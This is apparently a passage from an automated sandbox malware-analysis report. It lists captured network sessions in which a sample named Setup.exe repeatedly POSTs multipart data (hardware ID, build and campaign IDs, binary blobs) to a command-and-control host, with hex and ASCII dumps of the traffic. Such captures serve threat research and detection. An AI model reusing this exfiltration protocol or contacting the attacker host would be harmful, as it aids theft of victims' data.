                                                                                                      2025-01-01 15:56:23 UTC1369INData Raw: 6f 74 4d 34 31 46 7a 2f 78 6f 77 39 4c 66 77 69 70 4a 4c 38 52 30 41 35 4d 44 52 74 64 62 77 6d 7a 58 65 31 56 49 5a 6d 65 31 56 78 56 36 6b 57 48 6d 36 53 58 6d 36 39 4c 61 4d 69 77 4f 68 58 53 44 4e 31 73 43 4f 32 2f 53 4a 63 38 71 59 51 56 61 5a 35 78 47 64 46 61 68 65 63 4b 31 48 65 66 4b 2b 2f 34 75 58 53 66 51 61 42 75 76 4a 31 37 6a 62 38 35 55 7a 32 64 6c 66 48 70 48 76 55 63 6f 56 37 52 5a 34 70 77 49 6f 75 70 72 39 6e 62 4a 4e 38 67 39 47 38 59 72 4c 2f 4e 4c 37 30 6d 75 56 32 46 45 58 6c 75 56 64 7a 56 47 78 56 6e 53 32 54 58 48 31 75 76 57 4b 6d 55 76 72 47 77 62 6c 7a 4e 57 30 30 66 6d 41 4d 74 71 57 46 6c 61 5a 38 78 47 64 46 5a 4a 41 65 4c 68 4e 4d 74 4f 39 37 59 71 5a 51 50 49 52 52 76 47 4b 79 2f 7a 53 2b 39 4a 72 6c 64 74 55 47 35 72 35
                                                                                                      Data Ascii: otM41Fz/xow9LfwipJL8R0A5MDRtdbwmzXe1VIZme1VxV6kWHm6SXm69LaMiwOhXSDN1sCO2/SJc8qYQVaZ5xGdFahecK1HefK+/4uXSfQaBuvJ17jb85Uz2dlfHpHvUcoV7RZ4pwIoupr9nbJN8g9G8YrL/NL70muV2FEXluVdzVGxVnS2TXH1uvWKmUvrGwblzNW00fmAMtqWFlaZ8xGdFZJAeLhNMtO97YqZQPIRRvGKy/zS+9JrldtUG5r5
                                                                                                      2025-01-01 15:56:23 UTC1369INData Raw: 38 57 4a 2f 39 4a 66 76 2b 37 2b 6f 47 55 54 65 73 63 44 4f 4c 46 31 62 76 65 35 5a 6b 68 33 74 35 62 47 4a 62 69 55 63 74 56 6f 6c 74 2f 2f 77 77 77 2f 61 4b 32 30 39 4e 6d 32 67 6f 51 35 49 62 78 71 38 50 39 6c 54 2f 44 33 56 6b 56 69 4f 5a 42 68 52 76 6a 52 33 69 75 41 69 6a 73 71 75 47 4d 6a 41 33 67 58 51 48 69 68 49 72 38 33 76 69 63 50 74 37 53 55 52 4f 57 36 46 54 41 58 36 39 61 66 72 64 4c 65 76 2b 2f 38 49 47 51 54 66 59 63 43 75 72 4e 33 4c 57 56 75 64 49 30 7a 5a 59 41 56 71 6a 37 56 74 31 59 73 78 52 4e 76 46 4e 68 37 37 66 6d 6a 64 46 73 2b 68 45 46 36 38 50 43 2f 4d 71 35 69 33 50 53 32 68 68 4f 33 75 74 56 79 56 61 6b 57 48 43 79 54 58 66 78 74 66 79 46 67 55 7a 38 46 51 72 6d 79 63 43 32 33 2b 57 62 4f 74 6a 59 55 41 53 64 71 78 2b 46 55
                                                                                                      Data Ascii: 8WJ/9Jfv+7+oGUTescDOLF1bve5Zkh3t5bGJbiUctVolt//www/aK209Nm2goQ5Ibxq8P9lT/D3VkViOZBhRvjR3iuAijsquGMjA3gXQHihIr83vicPt7SUROW6FTAX69afrdLev+/8IGQTfYcCurN3LWVudI0zZYAVqj7Vt1YsxRNvFNh77fmjdFs+hEF68PC/Mq5i3PS2hhO3utVyVakWHCyTXfxtfyFgUz8FQrmycC23+WbOtjYUASdqx+FU
                                                                                                      2025-01-01 15:56:23 UTC1369INData Raw: 70 51 54 66 45 68 4e 61 41 68 55 4c 30 46 67 72 51 2b 73 65 2f 32 2f 6d 56 4a 63 53 57 46 6c 61 52 71 77 6e 38 46 65 73 57 51 50 45 43 61 4c 72 69 74 72 36 51 54 66 63 61 45 50 2b 4a 38 72 66 44 39 70 38 34 32 5a 52 5a 47 34 37 73 45 59 73 56 70 52 59 6e 37 77 77 77 2f 71 75 32 30 38 4d 52 6f 6b 68 56 75 5a 53 41 6f 35 76 75 30 69 57 56 6a 67 70 59 33 76 6b 52 6e 52 58 6b 56 57 32 74 52 48 50 73 75 62 47 31 72 57 50 79 45 51 58 69 78 64 58 38 6d 37 65 64 63 34 33 76 47 42 57 4d 2b 52 37 55 51 36 35 47 65 50 4e 4b 59 66 65 32 74 73 58 54 44 2f 30 57 43 75 76 44 77 76 50 48 35 35 6b 2f 77 35 70 63 42 4e 36 6c 45 64 52 65 72 45 52 78 75 41 31 68 37 4c 66 6d 69 4a 5a 45 74 52 55 58 34 38 69 53 38 70 58 69 6d 54 2f 54 32 30 31 5a 6a 2f 31 53 30 31 4c 76 58 6d
                                                                                                      Data Ascii: pQTfEhNaAhUL0FgrQ+se/2/mVJcSWFlaRqwn8FesWQPECaLritr6QTfcaEP+J8rfD9p842ZRZG47sEYsVpRYn7www/qu208MRokhVuZSAo5vu0iWVjgpY3vkRnRXkVW2tRHPsubG1rWPyEQXixdX8m7edc43vGBWM+R7UQ65GePNKYfe2tsXTD/0WCuvDwvPH55k/w5pcBN6lEdRerERxuA1h7LfmiJZEtRUX48iS8pXimT/T201Zj/1S01LvXm
                                                                                                      2025-01-01 15:56:23 UTC1369INData Raw: 78 66 53 32 6b 39 4d 62 75 53 67 46 34 4d 72 56 71 73 53 36 74 44 44 53 30 46 73 59 69 66 6f 52 69 78 57 6c 46 69 66 74 44 44 44 2b 71 37 62 54 77 78 47 69 53 46 57 35 6c 49 43 6a 6d 2b 37 53 4a 5a 57 4f 43 31 6a 65 2b 52 47 64 46 65 52 59 63 72 35 42 66 76 6d 6f 35 49 32 51 56 66 70 61 4f 4e 44 68 33 37 48 51 2b 5a 55 4e 36 2f 64 53 42 70 50 6b 56 76 74 72 6c 45 64 34 72 77 42 57 2b 61 7a 31 79 39 30 44 34 56 31 65 72 75 58 59 72 4e 6a 34 6c 58 4f 62 6c 6c 78 57 78 71 74 30 79 46 69 6d 57 48 6a 39 59 33 72 71 74 2f 6d 4d 30 77 32 35 45 55 61 32 68 4e 4f 32 78 66 71 64 4e 4a 6e 52 51 68 48 65 70 52 48 4c 46 66 73 57 66 72 56 53 66 66 57 39 75 6f 32 64 54 62 6b 43 53 50 65 45 78 50 79 4e 70 4e 78 7a 78 35 59 41 56 74 6e 6c 58 4d 52 57 72 56 56 74 72 55 52
                                                                                                      Data Ascii: xfS2k9MbuSgF4MrVqsS6tDDS0FsYifoRixWlFiftDDD+q7bTwxGiSFW5lICjm+7SJZWOC1je+RGdFeRYcr5Bfvmo5I2QVfpaONDh37HQ+ZUN6/dSBpPkVvtrlEd4rwBW+az1y90D4V1eruXYrNj4lXObllxWxqt0yFimWHj9Y3rqt/mM0w25EUa2hNO2xfqdNJnRQhHepRHLFfsWfrVSffW9uo2dTbkCSPeExPyNpNxzx5YAVtnlXMRWrVVtrUR


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.449732188.114.97.34436984C:\Users\user\Desktop\Setup.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-01 15:56:24 UTC275OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=GJEOV9UC
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 18102
                                                                                                      Host: locketsashayz.click
                                                                                                      2025-01-01 15:56:24 UTC15331OUTData Raw: 2d 2d 47 4a 45 4f 56 39 55 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 46 34 33 35 33 34 38 44 41 42 46 42 31 30 46 33 35 34 43 44 44 38 33 34 34 44 45 46 33 36 0d 0a 2d 2d 47 4a 45 4f 56 39 55 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 47 4a 45 4f 56 39 55 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 47 4a 45 4f 56 39 55 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                      Data Ascii: --GJEOV9UCContent-Disposition: form-data; name="hwid"48F435348DABFB10F354CDD8344DEF36--GJEOV9UCContent-Disposition: form-data; name="pid"2--GJEOV9UCContent-Disposition: form-data; name="lid"hRjzG3--TRON--GJEOV9UCContent-Dispositi
                                                                                                      2025-01-01 15:56:24 UTC2771OUTData Raw: cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56 2d 7b 91 d7 e9 19 4d
                                                                                                      Data Ascii: 3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V-{M
                                                                                                      2025-01-01 15:56:25 UTC1140INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 01 Jan 2025 15:56:25 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=vuc22r8inqfb9lr4vfj4h19f10; expires=Sun, 27 Apr 2025 09:43:04 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jYFiK8T1d0QojdxTisg7jlq6rSUP11%2F%2FfKKDf%2BMB8Z%2FUo%2BiufZTYwUusb0T1ENzBv2%2FukOn%2FPMxqj6JvhtJumHE0BsB0TlIzgvScIChx2onFHacJIh%2FgNai1ep8c3bvWlDz%2BQwuT"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fb3b2fe483d0f80-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1480&min_rtt=1476&rtt_var=561&sent=9&recv=21&lost=0&retrans=0&sent_bytes=2847&recv_bytes=19057&delivery_rate=1935056&cwnd=207&unsent_bytes=0&cid=63870b80eb2718ea&ts=638&x=0"
                                                                                                      2025-01-01 15:56:25 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2025-01-01 15:56:25 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.449735188.114.97.34436984C:\Users\user\Desktop\Setup.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-01 15:56:25 UTC278OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=O6L9KZCKEJV7
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 8747
                                                                                                      Host: locketsashayz.click
                                                                                                      2025-01-01 15:56:25 UTC8747OUTData Raw: 2d 2d 4f 36 4c 39 4b 5a 43 4b 45 4a 56 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 46 34 33 35 33 34 38 44 41 42 46 42 31 30 46 33 35 34 43 44 44 38 33 34 34 44 45 46 33 36 0d 0a 2d 2d 4f 36 4c 39 4b 5a 43 4b 45 4a 56 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4f 36 4c 39 4b 5a 43 4b 45 4a 56 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 4f 36 4c 39 4b 5a 43 4b 45 4a 56 37 0d 0a 43
                                                                                                      Data Ascii: --O6L9KZCKEJV7Content-Disposition: form-data; name="hwid"48F435348DABFB10F354CDD8344DEF36--O6L9KZCKEJV7Content-Disposition: form-data; name="pid"2--O6L9KZCKEJV7Content-Disposition: form-data; name="lid"hRjzG3--TRON--O6L9KZCKEJV7C
                                                                                                      2025-01-01 15:56:30 UTC1128INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 01 Jan 2025 15:56:30 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=pt1lpvkpresq38vhh8l1mpsqmf; expires=Sun, 27 Apr 2025 09:43:09 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9gu4gJ5LQY30NnDkjHITEQj5GwmvkTPm9fMGCBzLoKpcV%2BQBNdr8wq4nH3Q%2FpxglZRWwqHOGcemSnQ1ZejVzPK0XCDOrCboO5GtZF1d9Yv%2BygbUBHgcaFZo9D4hnC1AUBA0emcH0"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fb3b3059f6542d5-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1663&rtt_var=637&sent=6&recv=13&lost=0&retrans=0&sent_bytes=2846&recv_bytes=9683&delivery_rate=1698662&cwnd=221&unsent_bytes=0&cid=feae782e0792b40a&ts=4560&x=0"
                                                                                                      2025-01-01 15:56:30 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2025-01-01 15:56:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.449740188.114.97.34436984C:\Users\user\Desktop\Setup.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-01 15:56:31 UTC277OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=9MWOJXU86N
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 20388
                                                                                                      Host: locketsashayz.click
                                                                                                      2025-01-01 15:56:31 UTC15331OUTData Raw: 2d 2d 39 4d 57 4f 4a 58 55 38 36 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 46 34 33 35 33 34 38 44 41 42 46 42 31 30 46 33 35 34 43 44 44 38 33 34 34 44 45 46 33 36 0d 0a 2d 2d 39 4d 57 4f 4a 58 55 38 36 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 39 4d 57 4f 4a 58 55 38 36 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 39 4d 57 4f 4a 58 55 38 36 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                      Data Ascii: --9MWOJXU86NContent-Disposition: form-data; name="hwid"48F435348DABFB10F354CDD8344DEF36--9MWOJXU86NContent-Disposition: form-data; name="pid"3--9MWOJXU86NContent-Disposition: form-data; name="lid"hRjzG3--TRON--9MWOJXU86NContent-D
                                                                                                      2025-01-01 15:56:31 UTC5057OUTData Raw: 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78
                                                                                                      Data Ascii: lrQMn 64F6(X&7~`aO@dR<x
                                                                                                      2025-01-01 15:56:31 UTC1129INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 01 Jan 2025 15:56:31 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=fj6gc7rmuj0bo6s2q969t39nup; expires=Sun, 27 Apr 2025 09:43:10 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rmWms1awCgzFZEOPc4aLfz1N8pLdsD78utXCJEwir84f56597QRXNhIYFMFjStD1a%2FS6UqHQkcgJpBGbxPogJQE4DiP8zZrNXrq6%2BzrjwEwEzjliVkTmTZRhGeRyTl6IXCL%2B3Tbf"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fb3b326794943dd-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1609&min_rtt=1604&rtt_var=611&sent=10&recv=25&lost=0&retrans=0&sent_bytes=2846&recv_bytes=21345&delivery_rate=1776155&cwnd=196&unsent_bytes=0&cid=89ad0635fd88321d&ts=656&x=0"
                                                                                                      2025-01-01 15:56:31 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2025-01-01 15:56:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.449741188.114.97.34436984C:\Users\user\Desktop\Setup.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-01 15:56:33 UTC277OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=2W9N2HEFM8I
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 3779
                                                                                                      Host: locketsashayz.click
                                                                                                      2025-01-01 15:56:33 UTC3779OUTData Raw: 2d 2d 32 57 39 4e 32 48 45 46 4d 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 46 34 33 35 33 34 38 44 41 42 46 42 31 30 46 33 35 34 43 44 44 38 33 34 34 44 45 46 33 36 0d 0a 2d 2d 32 57 39 4e 32 48 45 46 4d 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 32 57 39 4e 32 48 45 46 4d 38 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 32 57 39 4e 32 48 45 46 4d 38 49 0d 0a 43 6f 6e 74 65
                                                                                                      Data Ascii: --2W9N2HEFM8IContent-Disposition: form-data; name="hwid"48F435348DABFB10F354CDD8344DEF36--2W9N2HEFM8IContent-Disposition: form-data; name="pid"1--2W9N2HEFM8IContent-Disposition: form-data; name="lid"hRjzG3--TRON--2W9N2HEFM8IConte
                                                                                                      2025-01-01 15:56:34 UTC1137INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 01 Jan 2025 15:56:34 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=k0gdenaoun1a906759r87qjsol; expires=Sun, 27 Apr 2025 09:43:12 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2BT%2FiONL7uoVkLj4TNxisVEm5JbBtzTN6W3G3GY%2B01ZKiBbV37LzTXY8BU5PRYSpKgvciwoFy5f0pMYQmTTu7EbVtriM%2Fcaaf1njC%2F2AAH91P%2FcTMtRHyQ%2Bn8JowJYiW6K%2Bu9JNsb"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8fb3b333ea7c4368-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1606&min_rtt=1594&rtt_var=622&sent=5&recv=10&lost=0&retrans=0&sent_bytes=2845&recv_bytes=4692&delivery_rate=1723730&cwnd=233&unsent_bytes=0&cid=f7e83efd6be9c94d&ts=902&x=0"
                                                                                                      2025-01-01 15:56:34 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                      Data Ascii: fok 8.46.123.189
                                                                                                      2025-01-01 15:56:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                      Data Ascii: 0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.449742188.114.97.34436984C:\Users\user\Desktop\Setup.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2025-01-01 15:56:34 UTC274OUTPOST /api HTTP/1.1
                                                                                                      Connection: Keep-Alive
                                                                                                      Content-Type: multipart/form-data; boundary=8YUU28F3
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                      Content-Length: 1204
                                                                                                      Host: locketsashayz.click
                                                                                                      2025-01-01 15:56:34 UTC1204OUTData Raw: 2d 2d 38 59 55 55 32 38 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 38 46 34 33 35 33 34 38 44 41 42 46 42 31 30 46 33 35 34 43 44 44 38 33 34 34 44 45 46 33 36 0d 0a 2d 2d 38 59 55 55 32 38 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 38 59 55 55 32 38 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 68 52 6a 7a 47 33 2d 2d 54 52 4f 4e 0d 0a 2d 2d 38 59 55 55 32 38 46 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                      Data Ascii: --8YUU28F3Content-Disposition: form-data; name="hwid"48F435348DABFB10F354CDD8344DEF36--8YUU28F3Content-Disposition: form-data; name="pid"1--8YUU28F3Content-Disposition: form-data; name="lid"hRjzG3--TRON--8YUU28F3Content-Dispositi
                                                                                                      2025-01-01 15:56:35 UTC1133INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 01 Jan 2025 15:56:35 GMT
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Transfer-Encoding: chunked
                                                                                                      Connection: close
                                                                                                      Set-Cookie: PHPSESSID=a083m6p4bao9eqdvrjnvnhdn9s; expires=Sun, 27 Apr 2025 09:43:14 GMT; Max-Age=9999999; path=/
                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                      Pragma: no-cache
                                                                                                      X-Frame-Options: DENY
                                                                                                      X-Content-Type-Options: nosniff
                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                      cf-cache-status: DYNAMIC
                                                                                                      vary: accept-encoding
